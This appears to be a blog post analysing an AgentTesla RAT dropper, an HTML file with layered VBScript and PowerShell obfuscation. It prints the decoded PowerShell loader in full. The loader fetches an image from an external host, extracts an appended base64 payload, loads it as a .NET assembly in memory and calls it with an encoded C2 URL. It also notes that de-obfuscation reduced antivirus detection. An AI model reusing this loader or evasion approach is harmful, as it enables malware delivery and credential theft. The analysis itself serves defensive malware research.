The file hash has been sampled already and has found malicious by major AD/EDR agents, even windows defender catches this and removes the file from disk. However , by de-obfuscating the VB script in the application i was able to get pass by defender and uploading the same to VT only 3 were able to detect it as malicious.

Further reviewing the HTML file manually in text editor we see the obfuscated VB script. Analyzing it I noticed a function where a parameter “command” is being passed and at the end of function call we see a object is being created and then executed.

Further deobfuscating the VB code we found a obfuscated powershell. This command is being passed to powershell to execute this is a 2nd level of obfuscation.

Decoding this powershell we see below script where a image is being downloaded from imageupload.io and extracting the embedded base64 string from the image ( the image is real its just that extra data is appended to the image) and loading the decoded base64 directly into memory.

$imageUrl = 'https://imageupload.io/ib/ekWgHWjP3arvUq7_1698166097.jpg';
$webClient = New-Object System.Net.WebClient;
$imageBytes = $webClient.DownloadData($imageUrl);
$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);
$startFlag = '<<BASE64_START>>';
$endFlag = '<<BASE64_END>>';
$startIndex = $imageText.IndexOf($startFlag);
$endIndex = $imageText.IndexOf($endFlag);
$startIndex -ge 0 -and $endIndex -gt $startIndex;
$startIndex += $startFlag.Length;
$base64Length = $endIndex - $startIndex;
$base64Command = $imageText.Substring($startIndex, $base64Length);
$commandBytes = [System.Convert]::FromBase64String($base64Command);
$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);
$type = $loadedAssembly.GetType('Fiber.Home');
$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmVsaWZkZXRhZHB1ZGlvcmRkZW1tYWhvbS80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))

Then i wrote a simple powershell script to download the image file and extract the base64 data, decode it and wrote it into a binary. Checking in PE headers we found out the name of the DLL to be Fiber.dll.

Note : even this DLL has been sampled and found to be highly malicious. Even defender detects and removes the file automatically for analysis i had added exclusion.

Further reviewing we found that final URL which was reversed and passed as a parameter to a method named “VAI” which was loaded from the DLL is now down so i stopped my analysis here. However checking the URL i see that it has been flagged by many and found to be associated with AgentTesla RAT operations.

At the time of writing this blog AgentTesla family of malware was the most reported malware on malware bazaar.